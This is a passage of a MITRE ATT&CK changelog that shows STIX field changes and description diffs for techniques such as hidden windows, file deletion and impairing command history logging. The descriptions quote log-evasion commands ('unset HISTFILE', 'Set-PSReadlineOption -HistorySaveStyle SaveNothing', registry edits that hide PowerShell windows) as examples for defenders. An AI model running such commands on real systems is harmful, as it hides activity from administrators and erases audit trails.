Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well. |
| x_mitre_version | 1.1 | 1.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Broadcom VMSA-2024-0019', 'description': 'Broadcom. (2024, September 17). VMSA-2024-0019: Questions & Answers. Retrieved April 8, 2025.', 'url': 'https://github.com/vmware/vcf-security-and-compliance-guidelines/blob/main/security-advisories/vmsa-2024-0019/README.md'} |
| external_references | | {'source_name': 'Ars Technica VMWare Code Execution Vulnerability 2021', 'description': 'Dan Goodin . (2021, February 25). Code-execution flaw in VMware has a severity rating of 9.8 out of 10. Retrieved April 8, 2025.', 'url': 'https://arstechnica.com/information-technology/2021/02/armed-with-exploits-hackers-on-the-prowl-for-a-critical-vmware-vulnerability/'} |
| x_mitre_platforms | | ESXi |
[T1090.002] Proxy: External Proxy
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-16 12:19:08.953000+00:00 | 2025-04-15 19:58:38.556000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1055.011] Process Injection: Extra Window Memory Injection
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Application control'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-11-10 18:29:31.004000+00:00 | 2025-04-15 19:58:00.917000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[T1008] Fallback Channels
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-07-14 19:49:47.340000+00:00 | 2025-04-15 19:59:20.736000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1568.001] Dynamic Resolution: Fast Flux DNS
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-27 16:10:37.183000+00:00 | 2025-04-15 19:58:16.171000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1070.004] Indicator Removal: File Deletion
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Adversaries may delete files left behind by the actions of t | t | Adversaries may delete files left behind by the actions of t |
| heir intrusion activity. Malware, tools, or other non-native | | heir intrusion activity. Malware, tools, or other non-native |
| files dropped or created on a system by an adversary (ex: [ | | files dropped or created on a system by an adversary (ex: [ |
| Ingress Tool Transfer](https://attack.mitre.org/techniques/T | | Ingress Tool Transfer](https://attack.mitre.org/techniques/T |
| 1105)) may leave traces to indicate to what was done within | | 1105)) may leave traces to indicate to what was done within |
| a network and how. Removal of these files can occur during a | | a network and how. Removal of these files can occur during a |
| n intrusion, or as part of a post-intrusion process to minim | | n intrusion, or as part of a post-intrusion process to minim |
| ize the adversary's footprint. There are tools available fr | | ize the adversary's footprint. There are tools available fr |
| om the host operating system to perform cleanup, but adversa | | om the host operating system to perform cleanup, but adversa |
| ries may use other tools as well.(Citation: Microsoft SDelet | | ries may use other tools as well.(Citation: Microsoft SDelet |
| e July 2016) Examples of built-in [Command and Scripting Int | | e July 2016) Examples of built-in [Command and Scripting Int |
| erpreter](https://attack.mitre.org/techniques/T1059) functio | | erpreter](https://attack.mitre.org/techniques/T1059) functio |
| ns include <code>del</code> on Windows and <code>rm</code> o | | ns include <code>del</code> on Windows, <code>rm</code> or < |
| r <code>unlink</code> on Linux and macOS. | | code>unlink</code> on Linux and macOS, and `rm` on ESXi. |
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Host forensic analysis'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 16:33:59.107000+00:00 | 2025-04-15 19:59:12.733000+00:00 |
| description | Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include del on Windows and rm or unlink on Linux and macOS. | Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary (ex: [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
There are tools available from the host operating system to perform cleanup, but adversaries may use other tools as well.(Citation: Microsoft SDelete July 2016) Examples of built-in [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) functions include del on Windows, rm or unlink on Linux and macOS, and `rm` on ESXi. |
| x_mitre_version | 1.1 | 1.2 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1071.002] Application Layer Protocol: File Transfer Protocols
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-01-18 17:23:22.591000+00:00 | 2025-04-15 19:58:52.946000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1083] File and Directory Discovery
Current version: 1.7
Version changed from: 1.6 → 1.7
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-16 12:40:10.978000+00:00 | 2025-04-15 19:58:44.118000+00:00 |
| x_mitre_version | 1.6 | 1.7 |
| x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1222] File and Directory Permissions Modification
Current version: 2.3
Version changed from: 2.2 → 2.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['File system access controls'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-19 17:54:06.038000+00:00 | 2025-04-16 20:37:17.378000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 2.2 | 2.3 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1495] Firmware Corruption
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-08-31 17:30:05.440000+00:00 | 2025-04-16 20:37:22.991000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.2 | 1.3 |
| x_mitre_platforms[3] | Network | Network Devices |
[T1553.001] Subvert Trust Controls: Gatekeeper Bypass
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Application Control'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-21 19:30:58.414000+00:00 | 2025-04-16 20:37:16.087000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.2 | 1.3 |
[T1558.001] Steal or Forge Kerberos Tickets: Golden Ticket
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-11-05 16:07:03.779000+00:00 | 2025-04-15 19:58:42.362000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1484.001] Domain or Tenant Policy Modification: Group Policy Modification
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator', 'User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-23 22:11:01.884000+00:00 | 2025-04-15 19:58:34.774000+00:00 |
| external_references[1]['description'] | Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved March 5, 2019. | Mandiant. (2016, February 25). Mandiant M-Trends 2016. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf | https://web.archive.org/web/20211024160454/https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/rpt-mtrends-2016.pdf |
| x_mitre_version | 1.0 | 1.1 |
[T1027.006] Obfuscated Files or Information: HTML Smuggling
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Web Content Filters', 'Static File Analysis'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-12 19:12:13.006000+00:00 | 2025-04-15 19:59:12.085000+00:00 |
| x_mitre_version | 1.1 | 1.2 |
[T1200] Hardware Additions
Current version: 1.7
Version changed from: 1.6 → 1.7
|
|
|---|
| t | Adversaries may introduce computer accessories, networking h | t | Adversaries may physically introduce computer accessories, n |
| ardware, or other computing devices into a system or network | | etworking hardware, or other computing devices into a system |
| that can be used as a vector to gain access. Rather than ju | | or network that can be used as a vector to gain access. Rat |
| st connecting and distributing payloads via removable storag | | her than just connecting and distributing payloads via remov |
| e (i.e. [Replication Through Removable Media](https://attack | | able storage (i.e. [Replication Through Removable Media](htt |
| .mitre.org/techniques/T1091)), more robust hardware addition | | ps://attack.mitre.org/techniques/T1091)), more robust hardwa |
| s can be used to introduce new functionalities and/or featur | | re additions can be used to introduce new functionalities an |
| es into a system that can then be abused. While public refe | | d/or features into a system that can then be abused. While |
| rences of usage by threat actors are scarce, many red teams/ | | public references of usage by threat actors are scarce, many |
| penetration testers leverage hardware additions for initial | | red teams/penetration testers leverage hardware additions f |
| access. Commercial and open source products can be leveraged | | or initial access. Commercial and open source products can b |
| with capabilities such as passive network tapping, network | | e leveraged with capabilities such as passive network tappin |
| traffic modification (i.e. [Adversary-in-the-Middle](https:/ | | g, network traffic modification (i.e. [Adversary-in-the-Midd |
| /attack.mitre.org/techniques/T1557)), keystroke injection, k | | le](https://attack.mitre.org/techniques/T1557)), keystroke i |
| ernel memory reading via DMA, addition of new wireless acces | | njection, kernel memory reading via DMA, addition of new wir |
| s to an existing network, and others.(Citation: Ossmann Star | | eless access points to an existing network, and others.(Cita |
| Feb 2011)(Citation: Aleks Weapons Nov 2015)(Citation: Frisk | | tion: Ossmann Star Feb 2011)(Citation: Aleks Weapons Nov 201 |
| DMA August 2016)(Citation: McMillan Pwn March 2012) | | 5)(Citation: Frisk DMA August 2016)(Citation: McMillan Pwn M |
| | | arch 2012) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-30 21:01:40.332000+00:00 | 2025-04-15 19:59:11.434000+00:00 |
| description | Adversaries may introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.(Citation: Ossmann Star Feb 2011)(Citation: Aleks Weapons Nov 2015)(Citation: Frisk DMA August 2016)(Citation: McMillan Pwn March 2012) | Adversaries may physically introduce computer accessories, networking hardware, or other computing devices into a system or network that can be used as a vector to gain access. Rather than just connecting and distributing payloads via removable storage (i.e. [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091)), more robust hardware additions can be used to introduce new functionalities and/or features into a system that can then be abused.
While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)), keystroke injection, kernel memory reading via DMA, addition of new wireless access points to an existing network, and others.(Citation: Ossmann Star Feb 2011)(Citation: Aleks Weapons Nov 2015)(Citation: Frisk DMA August 2016)(Citation: McMillan Pwn March 2012) |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
| x_mitre_version | 1.6 | 1.7 |
[T1564.005] Hide Artifacts: Hidden File System
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-29 15:12:11.024000+00:00 | 2025-04-15 19:59:14.404000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[T1564.001] Hide Artifacts: Hidden Files and Directories
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Host forensic analysis'] | |
| x_mitre_permissions_required | ['User'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-29 22:32:25.985000+00:00 | 2025-04-15 19:59:19.293000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[T1564.003] Hide Artifacts: Hidden Window
Current version: 1.3
Version changed from: 1.2 → 1.3
|
|
|---|
| t | Adversaries may use hidden windows to conceal malicious acti | t | Adversaries may use hidden windows to conceal malicious acti |
| vity from the plain sight of users. In some cases, windows t | | vity from the plain sight of users. In some cases, windows t |
| hat would typically be displayed when an application carries | | hat would typically be displayed when an application carries |
| out an operation can be hidden. This may be utilized by sys | | out an operation can be hidden. This may be utilized by sys |
| tem administrators to avoid disrupting user work environment | | tem administrators to avoid disrupting user work environment |
| s when carrying out administrative tasks. Adversaries may | | s when carrying out administrative tasks. Adversaries may |
| abuse these functionalities to hide otherwise visible window | | abuse these functionalities to hide otherwise visible window |
| s from users so as not to alert the user to adversary activi | | s from users so as not to alert the user to adversary activi |
| ty on the system.(Citation: Antiquated Mac Malware) On macO | | ty on the system.(Citation: Antiquated Mac Malware) On macO |
| S, the configurations for how applications run are listed in | | S, the configurations for how applications run are listed in |
| property list (plist) files. One of the tags in these files | | property list (plist) files. One of the tags in these files |
| can be <code>apple.awt.UIElement</code>, which allows for J | | can be <code>apple.awt.UIElement</code>, which allows for J |
| ava applications to prevent the application's icon from appe | | ava applications to prevent the application's icon from appe |
| aring in the Dock. A common use for this is when application | | aring in the Dock. A common use for this is when application |
| s run in the system tray, but don't also want to show up in | | s run in the system tray, but don't also want to show up in |
| the Dock. Similarly, on Windows there are a variety of feat | | the Dock. Similarly, on Windows there are a variety of feat |
| ures in scripting languages, such as [PowerShell](https://at | | ures in scripting languages, such as [PowerShell](https://at |
| tack.mitre.org/techniques/T1059/001), Jscript, and [Visual B | | tack.mitre.org/techniques/T1059/001), Jscript, and [Visual B |
| asic](https://attack.mitre.org/techniques/T1059/005) to make | | asic](https://attack.mitre.org/techniques/T1059/005) to make |
| windows hidden. One example of this is <code>powershell.exe | | windows hidden. One example of this is <code>powershell.exe |
| -WindowStyle Hidden</code>.(Citation: PowerShell About 2019 | | -WindowStyle Hidden</code>.(Citation: PowerShell About 2019 |
| ) In addition, Windows supports the `CreateDesktop()` API t | | ) The Windows Registry can also be edited to hide applicati |
| hat can create a hidden desktop window with its own correspo | | on windows from the current user. For example, by setting th |
| nding <code>explorer.exe</code> process.(Citation: Hidden VN | | e `WindowPosition` subkey in the `HKEY_CURRENT_USER\Console\ |
| C)(Citation: Anatomy of an hVNC Attack) All applications ru | | %SystemRoot%_System32_WindowsPowerShell_v1.0_PowerShell.exe` |
| nning on the hidden desktop window, such as a hidden VNC (hV | | Registry key to a maximum value, PowerShell windows will op |
| NC) session,(Citation: Hidden VNC) will be invisible to othe | | en off screen and be hidden.(Citation: Cantoris Computing) |
| r desktops windows. | | In addition, Windows supports the `CreateDesktop()` API that |
| | | can create a hidden desktop window with its own correspondi |
| | | ng <code>explorer.exe</code> process.(Citation: Hidden VNC)( |
| | | Citation: Anatomy of an hVNC Attack) All applications runni |
| | | ng on the hidden desktop window, such as a hidden VNC (hVNC) |
| | | session,(Citation: Hidden VNC) will be invisible to other d |
| | | esktops windows. |
New Detections:
- DS0024: Windows Registry (Windows Registry Key Modification)
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-13 14:28:20.651000+00:00 | 2025-04-15 19:59:07.977000+00:00 |
| description | Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks.
Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)
On macOS, the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.
Similarly, on Windows there are a variety of features in scripting languages, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden.(Citation: PowerShell About 2019)
In addition, Windows supports the `CreateDesktop()` API that can create a hidden desktop window with its own corresponding explorer.exe process.(Citation: Hidden VNC)(Citation: Anatomy of an hVNC Attack) All applications running on the hidden desktop window, such as a hidden VNC (hVNC) session,(Citation: Hidden VNC) will be invisible to other desktops windows. | Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden. This may be utilized by system administrators to avoid disrupting user work environments when carrying out administrative tasks.
Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)
On macOS, the configurations for how applications run are listed in property list (plist) files. One of the tags in these files can be apple.awt.UIElement, which allows for Java applications to prevent the application's icon from appearing in the Dock. A common use for this is when applications run in the system tray, but don't also want to show up in the Dock.
Similarly, on Windows there are a variety of features in scripting languages, such as [PowerShell](https://attack.mitre.org/techniques/T1059/001), Jscript, and [Visual Basic](https://attack.mitre.org/techniques/T1059/005) to make windows hidden. One example of this is powershell.exe -WindowStyle Hidden.(Citation: PowerShell About 2019)
The Windows Registry can also be edited to hide application windows from the current user. For example, by setting the `WindowPosition` subkey in the `HKEY_CURRENT_USER\Console\%SystemRoot%_System32_WindowsPowerShell_v1.0_PowerShell.exe` Registry key to a maximum value, PowerShell windows will open off screen and be hidden.(Citation: Cantoris Computing)
In addition, Windows supports the `CreateDesktop()` API that can create a hidden desktop window with its own corresponding explorer.exe process.(Citation: Hidden VNC)(Citation: Anatomy of an hVNC Attack) All applications running on the hidden desktop window, such as a hidden VNC (hVNC) session,(Citation: Hidden VNC) will be invisible to other desktops windows. |
| x_mitre_version | 1.2 | 1.3 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| external_references | | {'source_name': 'Cantoris Computing', 'description': 'Cantoris. (2016, July 22). PowerShell Malware. Retrieved December 12, 2024.', 'url': 'https://cantoriscomputing.wordpress.com/2016/07/22/powershell-malware/'} |
| x_mitre_contributors | | Vijay Lalwani |
| x_mitre_data_sources | | Windows Registry: Windows Registry Key Modification |
[T1564] Hide Artifacts
Current version: 1.4
Version changed from: 1.3 → 1.4
New Mitigations:
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-15 15:58:49.815000+00:00 | 2025-04-15 21:39:52.216000+00:00 |
| x_mitre_version | 1.3 | 1.4 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | ESXi |
[T1665] Hide Infrastructure
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-18 19:44:00.603000+00:00 | 2025-04-15 19:59:18.948000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
iterable_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | | Network Devices |
| x_mitre_platforms | | ESXi |
iterable_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_platforms | Network | |
[T1574] Hijack Execution Flow
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Anti-virus', 'Application Control'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-11-21 20:02:33.404000+00:00 | 2025-04-15 19:58:57.767000+00:00 |
| x_mitre_version | 1.2 | 1.3 |
[T1505.004] Server Software Component: IIS Components
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator', 'SYSTEM'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-17 15:06:24.161000+00:00 | 2025-04-15 19:58:59.560000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
[T1546.012] Event Triggered Execution: Image File Execution Options Injection
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_permissions_required | ['Administrator', 'SYSTEM'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-11-10 18:29:31.112000+00:00 | 2025-04-15 19:58:39.823000+00:00 |
| external_references[5]['description'] | Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. Retrieved November 12, 2014. | Tilbury, C. (2014, August 28). Registry Analysis with CrowdResponse. Retrieved November 17, 2024. |
| external_references[5]['url'] | http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/ | https://web.archive.org/web/20200730053039/https://www.crowdstrike.com/blog/registry-analysis-with-crowdresponse/ |
| x_mitre_version | 1.1 | 1.2 |
[T1562.003] Impair Defenses: Impair Command History Logging
Current version: 2.3
Version changed from: 2.2 → 2.3
|
|
|---|
| t | Adversaries may impair command history logging to hide comma | t | Adversaries may impair command history logging to hide comma |
| nds they run on a compromised system. Various command interp | | nds they run on a compromised system. Various command interp |
| reters keep track of the commands users type in their termin | | reters keep track of the commands users type in their termin |
| al so that users can retrace what they've done. On Linux a | | al so that users can retrace what they've done. On Linux a |
| nd macOS, command history is tracked in a file pointed to by | | nd macOS, command history is tracked in a file pointed to by |
| the environment variable <code>HISTFILE</code>. When a user | | the environment variable <code>HISTFILE</code>. When a user |
| logs off a system, this information is flushed to a file in | | logs off a system, this information is flushed to a file in |
| the user's home directory called <code>~/.bash_history</cod | | the user's home directory called <code>~/.bash_history</cod |
| e>. The <code>HISTCONTROL</code> environment variable keeps | | e>. The <code>HISTCONTROL</code> environment variable keeps |
| track of what should be saved by the <code>history</code> co | | track of what should be saved by the <code>history</code> co |
| mmand and eventually into the <code>~/.bash_history</code> f | | mmand and eventually into the <code>~/.bash_history</code> f |
| ile when a user logs out. <code>HISTCONTROL</code> does not | | ile when a user logs out. <code>HISTCONTROL</code> does not |
| exist by default on macOS, but can be set by the user and wi | | exist by default on macOS, but can be set by the user and wi |
| ll be respected. Adversaries may clear the history environm | | ll be respected. The `HISTFILE` environment variable is also |
| ent variable (<code>unset HISTFILE</code>) or set the comman | | used in some ESXi systems.(Citation: Google Cloud Threat In |
| d history size to zero (<code>export HISTFILESIZE=0</code>) | | telligence ESXi VIBs 2022) Adversaries may clear the histor |
| to prevent logging of commands. Additionally, <code>HISTCONT | | y environment variable (<code>unset HISTFILE</code>) or set |
| ROL</code> can be configured to ignore commands that start w | | the command history size to zero (<code>export HISTFILESIZE= |
| ith a space by simply setting it to "ignorespace". <code>HIS | | 0</code>) to prevent logging of commands. Additionally, <cod |
| TCONTROL</code> can also be set to ignore duplicate commands | | e>HISTCONTROL</code> can be configured to ignore commands th |
| by setting it to "ignoredups". In some Linux systems, this | | at start with a space by simply setting it to "ignorespace". |
| is set by default to "ignoreboth" which covers both of the p | | <code>HISTCONTROL</code> can also be set to ignore duplicat |
| revious examples. This means that “ ls” will not be saved, b | | e commands by setting it to "ignoredups". In some Linux syst |
| ut “ls” would be saved by history. Adversaries can abuse thi | | ems, this is set by default to "ignoreboth" which covers bot |
| s to operate without leaving traces by simply prepending a s | | h of the previous examples. This means that “ ls” will not b |
| pace to all of their terminal commands. On Windows systems | | e saved, but “ls” would be saved by history. Adversaries can |
| , the <code>PSReadLine</code> module tracks commands used in | | abuse this to operate without leaving traces by simply prep |
| all PowerShell sessions and writes them to a file (<code>$e | | ending a space to all of their terminal commands. On Windo |
| nv:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHo | | ws systems, the <code>PSReadLine</code> module tracks comman |
| st_history.txt</code> by default). Adversaries may change wh | | ds used in all PowerShell sessions and writes them to a file |
| ere these logs are saved using <code>Set-PSReadLineOption -H | | (<code>$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine |
| istorySavePath {File Path}</code>. This will cause <code>Con | | \ConsoleHost_history.txt</code> by default). Adversaries may |
| soleHost_history.txt</code> to stop receiving logs. Addition | | change where these logs are saved using <code>Set-PSReadLin |
| ally, it is possible to turn off logging to this file using | | eOption -HistorySavePath {File Path}</code>. This will cause |
| the PowerShell command <code>Set-PSReadlineOption -HistorySa | | <code>ConsoleHost_history.txt</code> to stop receiving logs |
| veStyle SaveNothing</code>.(Citation: Microsoft PowerShell C | | . Additionally, it is possible to turn off logging to this f |
| ommand History)(Citation: Sophos PowerShell command audit)(C | | ile using the PowerShell command <code>Set-PSReadlineOption |
| itation: Sophos PowerShell Command History Forensics) Adver | | -HistorySaveStyle SaveNothing</code>.(Citation: Microsoft Po |
| saries may also leverage a [Network Device CLI](https://atta | | werShell Command History)(Citation: Sophos PowerShell comman |
| ck.mitre.org/techniques/T1059/008) on network devices to dis | | d audit)(Citation: Sophos PowerShell Command History Forensi |
| able historical command logging (e.g. <code>no logging</code | | cs) Adversaries may also leverage a [Network Device CLI](ht |
| >). | | tps://attack.mitre.org/techniques/T1059/008) on network devi |
| | | ces to disable historical command logging (e.g. <code>no log |
| | | ging</code>). |
Details
dictionary_item_removed| STIX Field | Old value | New Value |
|---|
| x_mitre_defense_bypassed | ['Host forensic analysis', 'Log analysis'] | |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-30 21:01:47.940000+00:00 | 2025-04-15 19:58:50.696000+00:00 |
| description | Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, command history is tracked in a file pointed to by the environment variable HISTFILE. When a user logs off a system, this information is flushed to a file in the user's home directory called ~/.bash_history. The HISTCONTROL environment variable keeps track of what should be saved by the history command and eventually into the ~/.bash_history file when a user logs out. HISTCONTROL does not exist by default on macOS, but can be set by the user and will be respected.
Adversaries may clear the history environment variable (unset HISTFILE) or set the command history size to zero (export HISTFILESIZE=0) to prevent logging of commands. Additionally, HISTCONTROL can be configured to ignore commands that start with a space by simply setting it to "ignorespace". HISTCONTROL can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.
On Windows systems, the PSReadLine module tracks commands used in all PowerShell sessions and writes them to a file ($env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt by default). Adversaries may change where these logs are saved using Set-PSReadLineOption -HistorySavePath {File Path}. This will cause ConsoleHost_history.txt to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command Set-PSReadlineOption -HistorySaveStyle SaveNothing.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to disable historical command logging (e.g. no logging). | Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
